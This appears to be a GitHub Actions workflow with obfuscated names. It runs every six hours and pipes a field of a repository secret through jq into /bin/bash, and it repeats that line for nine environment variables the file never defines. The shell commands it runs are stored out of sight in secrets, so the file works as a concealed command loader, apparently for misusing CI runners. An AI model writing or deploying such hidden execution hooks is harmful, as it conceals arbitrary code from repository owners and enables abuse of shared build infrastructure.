name: wanf2xy
on:
  workflow_dispatch:
  schedule:
    - cron: '18 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wanf2xy
        env:
          a4: ${{ secrets.a4 }}
        run: |
          echo $a4 | jq -r .addr18 | /bin/bash
          echo $q07353 | jq -r .ccx79061 | /bin/bash
          echo $ktdwp84 | jq -r .eg304 | /bin/bash
          echo $zxvzh2 | jq -r .nidwf00 | /bin/bash
          echo $oly2520 | jq -r .esvkd96 | /bin/bash
          echo $efj410 | jq -r .cfrqg0 | /bin/bash
          echo $bgb36814 | jq -r .ew645 | /bin/bash
          echo $ws58046 | jq -r .pjcm7 | /bin/bash
          echo $q061 | jq -r .krhzi05 | /bin/bash
          echo $evjb8214 | jq -r .yws884 | /bin/bash

